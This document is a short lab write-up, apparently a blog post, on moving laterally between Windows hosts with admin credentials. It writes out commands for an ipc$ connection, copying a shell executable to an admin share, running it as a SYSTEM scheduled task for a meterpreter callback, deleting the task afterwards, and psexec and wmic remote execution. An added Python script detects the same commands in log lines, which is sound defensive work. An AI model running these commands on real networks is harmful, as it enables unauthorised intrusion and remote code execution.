
Common reverse shells on an internal network


This Wind


I saw this in an article on a WeChat public account; I had read it before but never tried it out, so this is me filling in that gap.

Environment

Requirement: you know the administrator credentials

Windows Server 2008: 192.168.241.172
Windows Server 2008 (2): 192.168.241.171
Kali: 192.168.241.174


Old-school ipc$

Establish the connection

net use \\<IP>\ipc$ /user:administrator "<password>"


Copy the shell to the target machine

copy shell.exe \\<IP>\C$\windows\Temp\xxx.exe


Create the scheduled task and run it

schtasks /create /tn "plugin_update" /tr C:\Windows\Temp\xxx.exe /sc once /st <time> /S <IP> /RU System
schtasks /run /tn "plugin_update" /S <IP>


The meterpreter session that called back


Delete the task once it has run

schtasks /delete /tn "plugin_update" /S <IP>


psexec

psexec \\<IP> -u <username> -p <password> <command> #runs the command, waits for the process to exit, and returns the output
psexec -accepteula \\<IP> -d -u <username> -p <password> <command> #runs the command without waiting for the result; non-interactive
-accepteula: suppresses the license agreement dialog
-d: do not wait for the process to terminate (non-interactive)


Non-interactive, nothing is echoed back


wmic (non-interactive)

wmic /node:<IP> /user:<username> /password:<password> process call create <command>
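From the defender's side, an added example that is not part of the original post: a Python script that scans constructed process-creation log lines for the command patterns used above (ipc$ session, copy to an admin share, remote schtasks with /S and /RU System, psexec, wmic /node) and groups the hits by target host, so the whole chain against one machine stands out. The "Image | CommandLine" log format, rule names and sample lines are all assumptions made for this example.

```python
import re

# Constructed sample events (Sysmon EventID 1 style, flattened to "Image | CommandLine").
# Passwords are masked with ****; these are not real telemetry.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\net.exe | net use \\192.168.241.172\ipc$ /user:administrator ****",
    r"C:\Windows\System32\cmd.exe | copy shell.exe \\192.168.241.172\C$\windows\Temp\xxx.exe",
    r"C:\Windows\System32\schtasks.exe | schtasks /create /tn plugin_update /tr C:\Windows\Temp\xxx.exe /sc once /st 12:00 /S 192.168.241.172 /RU System",
    r"C:\Windows\System32\schtasks.exe | schtasks /delete /tn plugin_update /S 192.168.241.172",
    r"C:\Tools\psexec.exe | psexec -accepteula \\192.168.241.172 -d -u administrator -p **** cmd.exe",
    r"C:\Windows\System32\wbem\wmic.exe | wmic /node:192.168.241.172 /user:administrator /password:**** process call create cmd.exe",
    r"C:\Windows\System32\schtasks.exe | schtasks /create /tn backup /tr C:\bak.bat /sc daily /st 01:00",
    r"C:\Windows\System32\net.exe | net use Z: \\fileserver\share",
]

# Detection rules: (name, regex over the command line). Rule names are made up here.
RULES = [
    ("admin_share_ipc",       re.compile(r"net\s+use\s+\\\\\S+\\ipc\$", re.I)),
    ("admin_share_copy",      re.compile(r"\\\\\S+\\[a-z]\$\\", re.I)),          # \\host\C$\...
    ("remote_schtask_system", re.compile(r"schtasks\s+/create.*\s/S\s+\S+.*\s/RU\s+system", re.I)),
    ("remote_schtask_mgmt",   re.compile(r"schtasks\s+/(run|delete)\b.*\s/S\s+\S+", re.I)),
    ("psexec_remote",         re.compile(r"psexec(\.exe)?\b.*\\\\[\w.\-]+", re.I)),
    ("wmic_remote_create",    re.compile(r"wmic\s+/node:\S+.*process\s+call\s+create", re.I)),
]

# Pull the remote host out of a UNC path, a wmic /node: argument, or a schtasks /S argument.
TARGET_RX = re.compile(r"\\\\([\w.\-]+)|/node:([\w.\-]+)|\s/S\s+([\w.\-]+)", re.I)


def target_of(cmdline):
    m = TARGET_RX.search(cmdline)
    return next((g for g in m.groups() if g), None) if m else None


def detect(events):
    """Return (rule_name, target_host, cmdline) for every event that matches a rule."""
    hits = []
    for line in events:
        _, _, cmdline = line.partition(" | ")
        cmdline = cmdline.strip()
        for name, rx in RULES:
            if rx.search(cmdline):
                hits.append((name, target_of(cmdline), cmdline))
    return hits


def chains_by_target(events):
    """Group matched rule names per target host; several rules on one host is the lateral-movement chain."""
    chains = {}
    for name, target, _ in detect(events):
        chains.setdefault(target, []).append(name)
    return chains
```

Run against SAMPLE_EVENTS, the six hits all point at 192.168.241.172 while the local daily task and the plain file-share mapping are left alone.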
